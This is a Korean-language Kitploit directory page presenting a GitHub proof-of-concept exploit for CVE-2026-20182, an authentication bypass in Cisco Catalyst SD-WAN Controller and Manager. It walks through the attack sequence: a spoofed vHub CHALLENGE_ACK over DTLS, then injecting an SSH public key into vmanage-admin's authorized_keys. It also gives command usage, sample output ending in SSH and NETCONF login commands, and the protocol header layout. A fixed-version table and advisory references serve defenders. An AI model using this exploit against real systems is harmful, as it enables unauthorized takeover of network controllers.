Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-20182 — CVE-2026-20182 PoC - Cisco Catalyst SD-WAN Controller / Manager 인증 우회 (CVSS 10.0) | Kitploit
도구/GitHubGitHub/portbuster1337/cve-2026-20182
Exploit FrameworksVulnerability AnalysisExploitationNetwork SecurityPenetration TestingCloud SecurityAuthenticationRed Teaming
GitHubportbuster1337/cve-2026-20182

CVE-2026-20182

CVE-2026-20182 PoC - Cisco Catalyst SD-WAN Controller / Manager 인증 우회 (CVSS 10.0)

저장소 보기
333개월 전아직 검토되지 않음
웹사이트

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-20182 — Cisco Catalyst SD-WAN Controller / Manager 인증 우회

CVE-2026-20182에 대한 개념 증명(PoC) 익스플로잇으로, Cisco Catalyst SD-WAN Controller(vSmart) 및 Manager(vManage)의 vdaemon DTLS 서비스(UDP/12346)에서 발생하는 치명적인(CVSS 10.0) 인증 우회 취약점입니다.

공개일: 2026년 5월 14일, Rapid7(Stephen Fewer & Jonah Burgess)
CISA KEV: 2026년 5월 14일 추가(긴급 지시 26-03)
CVSS: 10.0 — CWE-287: 부적절한 인증(Improper Authentication)

취약점

vdaemon 서비스는 다단계 DTLS 핸드셰이크를 사용하여 컨트롤 플레인 피어를 인증합니다. vbond_proc_challenge_ack() 함수는 장치 유형별 인증서 검증을 구현하지만, 장치 유형 2(vHub)에는 검증 코드 경로가 없습니다. device_type=2로 CHALLENGE_ACK를 전송하면 함수가 모든 조건문을 통과하여 무조건 peer->authenticated = 1로 설정합니다.

유효한 자격 증명, CA 서명 인증서, SD-WAN 배포에 대한 지식이 전혀 필요하지 않습니다.

익스플로잇 동작 방식

  1. 대상의 vdaemon 서비스(UDP/12346)에 DTLS 1.2 연결을 수립합니다
  2. CHALLENGE 메시지(msg_type=8)를 수신합니다
  3. vHub(device_type=2)임을 주장하는 CHALLENGE_ACK를 전송합니다 → 피어가 인증된 것으로 표시됩니다
  4. HELLO(msg_type=5)를 전송합니다 → 피어가 UP 상태로 전환됩니다
  5. MSG_VMANAGE_TO_PEER(msg_type=14)를 통해 에 SSH 공개 키를 주입합니다
/home/vmanage-admin/.ssh/authorized_keys
  • vmanage-admin으로 NETCONF 액세스(SSH TCP/830) 또는 SSH 액세스(TCP/22)를 부여합니다
  • 사용 방법

    root@kitploit:~
    python3 cve-2026-20182.py -t <target> [options]
    

    옵션

    인자설명
    -t, --target대상 IP 또는 호스트 이름
    --portvdaemon UDP 포트(기본값: 12346)
    --key-file주입할 기존 SSH 공개 키의 경로(선택 사항)
    --netconfSSH로 NETCONF에 연결하여 익스플로잇 성공 여부 검증

    예시

    root@kitploit:~
    # 새 키 쌍을 생성하고 익스플로잇 수행
    python3 cve-2026-20182.py -t 192.168.1.100
    
    # 기존 공개 키 사용
    python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub
    
    # 익스플로잇 수행 후 NETCONF로 검증
    python3 cve-2026-20182.py -t 192.168.1.100 --netconf
    

    출력

    root@kitploit:~
    [*] Targeting 192.168.1.100:12346 (vdaemon DTLS)
    [+] DTLS handshake complete (received msg_type=8, 1027 bytes)
    [*] Sending CHALLENGE_ACK with device_type=2 (vHub) ...
    [+] peer->authenticated = 1 (authentication bypassed!)
    [*] Sending HELLO ...
    [+] Peer is UP state (peering handshake bypass successful)
    [*] Injecting SSH public key ...
    
    [+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 [email protected]
    [+] SSH:     ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa [email protected]
    

    영향을 받는 버전

    릴리스수정 버전
    < 20.9지원되는 릴리스로 마이그레이션
    20.920.9.9.1
    20.1020.12.7.1
    20.1120.12.7.1
    20.1220.12.5.4 / 20.12.6.2 / 20.12.7.1
    20.1320.15.5.2
    20.1420.15.5.2
    20.1520.15.4.4 / 20.15.5.2
    20.1620.18.2.2
    20.1820.18.2.2
    26.1.126.1.1.1

    연구 참고 자료

    • Rapid7(최초 공개): CVE-2026-20182: Cisco Catalyst SD-WAN Controller의 치명적인 인증 우회 — Stephen Fewer & Jonah Burgess의 전체 기술 분석, 디컴파일된 코드 및 프로토콜 상세 정보
    • Cisco 보안 권고: cisco-sa-sdwan-rpa2-v69WY2SW — 수정 버전이 포함된 공급업체 권고
    • CISA KEV: CVE-2026-20182 — 긴급 지시 26-03(2026년 5월 17일까지 수정 적용)
    • NVD: CVE-2026-20182 — 미국 국가 취약점 데이터베이스(NVD) 항목
    • Rapid7 Metasploit 모듈: cisco_sdwan_vhub_auth_bypass — Metasploit 프레임워크의 보조(auxiliary) 모듈
    • BleepingComputer: Cisco, 제로데이 공격에 악용된 새로운 치명적 SD-WAN 결함 경고
    • Tenable: Cisco SD-WAN 취약점의 지속적인 악용에 관한 FAQ
    • Cisco Talos: 위협 행위자 UAT-8616이 이 취약점을 실제 환경(in the wild)에서 악용한 것으로 확인됨

    기술적 세부 사항

    vdaemon 프로토콜 헤더는 12바이트입니다:

    오프셋크기필드설명
    01msg_type하위 니블 = 타입, 상위 니블 = 버전
    11device_info상위 니블 = device_type, 하위 니블 = 플래그
    21flags표준 값 0xA0
    31padding항상 0x00
    4-74domain_id빅엔디안 uint32
    8-114site_id빅엔디안 uint32

    장치 유형: 1=vEdge, 2=vHub, 3=vSmart, 4=vBond, 5=vManage

    요구 사항

    • Python 3.7+
    • openssl CLI(DTLS 전송용)
    • cryptography 라이브러리(pip install cryptography)

    면책 조항

    이 익스플로잇은 명시적인 서면 허가를 받은 시스템에 대한 공인된 레드 팀 운영, 침투 테스트 및 보안 연구 목적으로만 제공됩니다. 무단 사용은 불법입니다.

    도구 다운로드